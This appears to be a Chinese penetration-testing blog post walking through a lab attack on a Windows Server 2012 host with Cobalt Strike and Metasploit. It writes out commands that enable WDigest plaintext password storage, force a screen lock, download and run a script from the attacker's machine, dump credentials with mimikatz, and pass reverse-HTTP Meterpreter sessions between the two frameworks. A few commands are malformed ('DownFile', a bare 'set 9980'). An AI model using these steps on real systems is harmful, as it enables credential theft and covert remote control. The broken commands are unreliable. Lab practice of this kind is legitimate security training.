渗透笔记三

攻击IP:192.168.17.132(kali——cs服务端、msf所在主机)

靶机IP:192.168.17.134(win2012)

Cobalt Strike抓取win2012明文密码,以及将会话传递到 Metasploit Framework 上整体过程

1.cs生成木马文件并使目标服务器中马

首先启动cs服务器,然后启动客户端

建立监听

监听创建完毕

生成木马

使目标服务器中马后,我们就可以获取想要的东西了

2.抓取目标主机的明文密码

目标服务器已上线

因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

修改注册表成功之后,需要用户注销或者重新登陆之后才会生效。所以我们编写一个强制锁屏脚本(只有windows服务器会生效)

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

3.打开Metasploit Framework

调用 exploit/multi/handler 模块,在该模块上配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。之后运行该模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在 Cobalt Strike 上创建一个 Foreign HTTP 的监听

监听 IP 和端口设置成刚才 Metasploit Framework 上所监听的 IP 和端口,接着在 Cobalt Strike 上右击选择要传递的会话,找到 Spawn 选项,选择刚刚创建的监听器即可

成功将cs的会话传递到msf上

Metasploit Framework抓取win2012明文密码,以及将会话传递到 Cobalt Strike 上整体过程

1.msf生成木马文件并使服务器中马

启动msf

生成木马

使目标服务器中马后,我们就可以获取想要的东西了

2.抓取目标主机的明文密码

因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令。(由于我在cs入侵Win2012服务器是已经在服务器上下载过强制锁屏了,所以这就直接使用,不用在进行远程控制下载了。)

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz(和在cs上远程控制服务器下载强制锁屏脚本一样,只需要在kali上开启http服务器就可以了)

启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

3.打开Cobalt Strike

创建一个监听

4.打开Metasploit Framework

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit

成功将msf的会话传递到cs上了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值